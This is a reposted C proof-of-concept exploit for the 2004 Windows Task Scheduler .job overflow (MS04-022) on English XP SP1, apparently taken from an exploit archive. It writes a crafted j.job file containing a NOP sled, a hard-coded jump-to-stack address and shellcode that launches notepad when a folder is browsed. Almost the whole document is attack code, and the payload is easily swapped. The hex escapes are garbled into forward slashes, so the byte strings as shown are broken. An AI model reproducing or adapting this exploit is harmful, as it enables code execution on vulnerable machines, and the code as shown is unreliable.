Microsoft Windows 2K/XP Task Scheduler .job Exploit (MS04-022)

代码:


//*************************************************************
// Microsoft Windows 2K/XP Task Scheduler Vulnerability (MS04-022)
// Proof-of-Concept Exploit for English WinXP SP1
// 15 Jul 2004
//
// Running this will create a file "j.job". When explorer.exe or any
// file-open dialog box accesses the directory containing this file,
// notepad.exe will be spawn.
//
// Greetz: snooq, sk and all guys at SIG^2 www security org sg
//
//*************************************************************

#include <stdio.h>
#include <windows.h>


unsigned char jobfile[] =
"/x01/x05/x01/x00/xD9/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF"
"/xFF/xFF/xFF/xFF/x46/x00/x92/x00/x00/x00/x00/x00/x3C/x00/x0A/x00"
"/x20/x00/x00/x00/x00/x14/x73/x0F/x00/x00/x00/x00/x03/x13/x04/x00"
"/xC0/x00/x80/x21/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00/x80/x01/x44/x00/x3A/x00/x5C/x00/x61/x00"
"/x2E/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"

"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"

"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"


"/x78/x00/x78/x00/x78/x00/x78/x00/x79/x00/x79/x00/x79/x00/x79/x00"
"/x7A/x00/x7A/x00/x7A/x00/x7A/x00/x7B/x00/x7B/x00/x7B/x00"
"/x5b/xc1/xbf/x71" // jmp esp in SAMLIB WinXP SP1
"/x42/x42/x42/x42/x43/x43/x43/x43/x44/x44/x44/x44"
"/x90/x90" // jmp esp lands here
"/xEB/x80" // jmp backward into shellcode
"/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"
"/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"
"/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"
"/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"
"/x61/x00/x61/x00/x61/x00/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20"
"/x20/x20/x20/x20/x20/x20/x00/x00/x00/x00/x04/x00/x44/x00/x3A/x00"
"/x5C/x00/x00/x00/x07/x00/x67/x00/x75/x00/x65/x00/x73/x00/x74/x00"
"/x31/x00/x00/x00/x00/x00/x00/x00/x08/x00/x03/x13/x04/x00/x00/x00"
"/x00/x00/x01/x00/x30/x00/x00/x00/xD4/x07/x07/x00/x0F/x00/x00/x00"
"/x00/x00/x00/x00/x0B/x00/x26/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x01/x00/x00/x00/x01/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00";


/*
* Harmless payload that spawns 'notepad.exe'... =p
* Ripped from snooq's WinZip exploit
*/

unsigned char shellcode[]=
"/x33/xc0" // xor eax, eax // slight modification to move esp up
"/xb0/xf0" // mov al, 0f0h
"/x2b/xe0" // sub esp,eax
"/x83/xE4/xF0" // and esp, 0FFFFFFF0h
"/x55" // push ebp
"/x8b/xec" // mov ebp, esp
"/x33/xf6" // xor esi, esi
"/x56" // push esi
"/x68/x2e/x65/x78/x65" // push 'exe.'
"/x68/x65/x70/x61/x64" // push 'dape'
"/x68/x90/x6e/x6f/x74" // push 'ton'
"/x46" // inc esi
"/x56" // push esi
"/x8d/x7d/xf1" // lea edi, [ebp-0xf]
"/x57" // push edi
"/xb8XXXX" // mov eax, XXXX -> WinExec()
"/xff/xd0" // call eax
"/x4e" // dec esi
"/x56" // push esi
"/xb8YYYY" // mov eax, YYYY -> ExitProcess()
"/xff/xd0"; // call eax


int main(int argc, char* argv[])
{
unsigned char *ptr = (unsigned char *)shellcode;

while (*ptr)
{
if (*((long *)ptr)==0x58585858)
{
*((long *)ptr) = (long)GetProcAddress(GetModuleHandle("kernel32.dll"), "WinExec");
}
if (*((long *)ptr)==0x59595959)
{
*((long *)ptr) = (long)GetProcAddress(GetModuleHandle("kernel32.dll"), "ExitProcess");
}
ptr++;
}

FILE *fp;
fp = fopen("j.xxx", "wb");
if(fp)
{
unsigned char *ptr = jobfile + (31 * 16);
memcpy(ptr, shellcode, sizeof(shellcode) - 1);

fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
fclose(fp);
DeleteFile("j.job");
MoveFile("j.xxx", "j.job");
}
return 0;
}